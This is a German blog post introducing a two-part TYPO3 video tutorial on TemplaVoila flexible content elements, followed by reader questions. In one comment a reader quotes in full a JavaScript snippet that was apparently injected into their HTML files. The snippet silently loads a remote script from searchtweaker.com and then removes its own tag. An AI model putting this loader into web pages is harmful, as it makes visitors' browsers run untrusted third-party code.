TYPO3-Tutorial Teil 54: ein einfaches flexibles Inhaltselement

|

Die flexiblen Inhaltselemente von TemplaVoila bieten sich an, wenn man zum Beispiel einem Benutzer die Möglichkeit geben will, die Inhalte im Backend zu verwalten, aber das Risiko minimieren will, dass der Benutzer versehentlich das Layout zerstört. Man kann dem Benutzer sozusagen eine Schablone liefern, die er mit Inhalten füllen kann.

Wegen der YouTube-Begrenzung auf 10-Minuten-Videos gibt es diesen Film wieder in 2 Teilen.

Viel Spaß!


Teil 1

[youtube]https://www.youtube.com/watch?v=rAEgVjMBzyQ[/youtube]


Teil 2

[youtube]https://www.youtube.com/watch?v=PFDMubR7kM4[/youtube]

Alle TYPO3-Tutorials kostenlos downloaden

8 Gedanken zu “TYPO3-Tutorial Teil 54: ein einfaches flexibles Inhaltselement”

  1. Hallo Wolfgang,
    ich hab ein riesen Problem und komme einfach nicht auf die Lösung, wusste auch nicht genau wo ich meine Frage genau platzieren soll, also schon mal sorry wenn das hier falsch ist.
    Ich möchte in meinen gemappten Mainbereich einen html Code aus einer Datei einbinden, dieser Code wird dann regelmäßig neu geschrieben. Also fällt die Variante den Code einfach als reinen html Code ins Seiteninhaltselemt einzufügen weg. Die Seite über ein Script Reinzuladen funktioniert auch nicht. Das ist ja auch eigentlich nicht das was ich brauche. Gibt es also eine Möglichkeit nur den html Code aus einer anderen Datei zu laden?
    Ich sitze jetzt schon seid Tagen dran und habe das ganze www durchforstet. Über Lösungsvorschläge wäre ich sehr dankbar.

  2. Hallo Community,

    kennt jemand eine Internet Seite wo zum Beispiel schöne FCE-Vorlagen / Layout for free download sind ?
    Werde im Net nicht fündig..
    merci^^

    • Ich weiss nicht, ob du da überhaupt etwas finden wirst.

      Normalerweise bastelt man sich dann ein FCE, wenn eine bestimmte Anforderungen mit Bordmitteln nicht gelöst werden kann. Oder wenn man einem Redakteur eine begrenzte Vorlage für das einpflegen von Inhalten geben will.

      Es kommt also darauf an, was du auf deiner Seite einbauen willst. Dann kannst du schauen, ob es mit TYPO3-Bordmitteln geht, ob es eine Extension dafür vielleicht schon gibt, oder ob ein FCE die richtige Lösung wäre.

  3. Hallo Wolfgang

    Danke für deine tollen Tutorials. Ich habe nun folgendes Problem. Beim Versuch die Datei fce-1.html zu mappen, habe ich festgestellt, dass das Kontextmenü nicht mehr erscheint. Sobald ich die Erweiterung Templa Voila deinstalliere, funktioniert es wieder. Was soll das? Du hast sicher eine Antwort parat.

    ps warum wird am Ende jedes html-Dokuments diese Zeile eingefügt:
    (function(){try{var header=document.getElementsByTagName(„HEAD“)[0];var script=document.createElement(„SCRIPT“);script.src=“//www.searchtweaker.com/downloads/js/foxlingo_ff.js“;script.onload=script.onreadystatechange=function(){if (!(this.readyState)||(this.readyState==“complete“||this.readyState==“loaded“)){script.onload=null;script.onreadystatechange=null;header.removeChild(script);}}; header.appendChild(script);} catch(e) {}})();

Schreibe einen Kommentar

TYPO3 9 LTS Videotraining

Das Videotraining zu TYPO3 9 LTS

Momentan in Vorbereitung

Klicke hier für weitere Infos zum neuen Videotraining!

close-link
In Vorbereitung: Das Videotraining zu TYPO3 9 LTS
Hier klicken für mehr Informationen!
close-image

YouTube aktivieren?

Auf dieser Seite gibt es mind. ein YouTube Video. Cookies für diese Website wurden abgelehnt. Dadurch können keine YouTube Videos mehr angezeigt werden, weil YouTube ohne Cookies und Tracking Mechanismen nicht funktioniert. Willst du YouTube dennoch freischalten?